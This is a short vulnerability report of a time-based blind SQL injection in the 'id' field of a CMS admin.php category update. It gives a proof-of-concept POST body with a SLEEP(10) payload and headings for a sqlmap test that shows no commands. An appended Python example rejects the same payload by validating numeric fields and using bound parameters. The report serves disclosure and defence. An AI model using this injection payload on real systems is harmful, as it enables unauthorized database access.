Log in to the background as the default account admin.
We click in order and grab packets:
There is a time-based blind SQL injection vulnerability in the location of id.
POC: http://192.168.102.129:82/admin/admin.php
post:name=test&nickname=test&fid=&cattpl=&listtpl=&distpl=&intro=test&orders=0&status=1&action=category&id=3) AND (SELECT 8663 FROM (SELECT(SLEEP(10)))IUse) AND (6655=6655&ctrl=update&Submit=%E6%8F%90%E4%B
sqlmap:
Save the HTTP request package as a file.
Test using the SQLMap tool:
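
A server-side mitigation for the `id` parameter reported above, as an added example that is not part of the original report or the project's code: numeric fields are validated before use, and the update runs with bound parameters. The table and column names, the function names and the SQLite backend are assumptions made for illustration.

```python
import sqlite3
from urllib.parse import parse_qsl

# Constructed from the POC body in the report (only the fields used here).
POC_BODY = ("name=test&nickname=test&intro=test&orders=0&status=1&action=category"
            "&id=3) AND (SELECT 8663 FROM (SELECT(SLEEP(10)))IUse) AND (6655=6655"
            "&ctrl=update")
BENIGN_BODY = ("name=test&nickname=test&intro=test&orders=0&status=1"
               "&action=category&id=3&ctrl=update")

INT_FIELDS = ("id", "orders", "status")  # fields the handler treats as numbers


def parse_category_update(body):
    """Parse the form body and reject non-numeric values in numeric fields."""
    fields = dict(parse_qsl(body, keep_blank_values=True))
    for key in INT_FIELDS:
        value = fields.get(key, "")
        # Only the characters 0-9 are accepted; anything else never reaches SQL.
        if not (value.isascii() and value.isdigit()):
            raise ValueError(f"field {key!r} must be an unsigned integer")
        fields[key] = int(value)
    return fields


def update_category(conn, fields):
    """Bound parameters keep every value out of the SQL text (hypothetical schema)."""
    cur = conn.execute(
        "UPDATE category SET name = ?, nickname = ?, intro = ?, orders = ?, status = ?"
        " WHERE id = ?",
        (fields["name"], fields["nickname"], fields["intro"],
         fields["orders"], fields["status"], fields["id"]),
    )
    conn.commit()
    return cur.rowcount


def demo():
    """Return (rows updated by the benign request, whether the POC body was rejected)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE category (id INTEGER PRIMARY KEY, name TEXT,"
                 " nickname TEXT, intro TEXT, orders INTEGER, status INTEGER)")
    conn.execute("INSERT INTO category VALUES (3, 'old', 'old', 'old', 9, 0)")
    updated = update_category(conn, parse_category_update(BENIGN_BODY))
    try:
        parse_category_update(POC_BODY)
        rejected = False
    except ValueError:
        rejected = True
    return updated, rejected
```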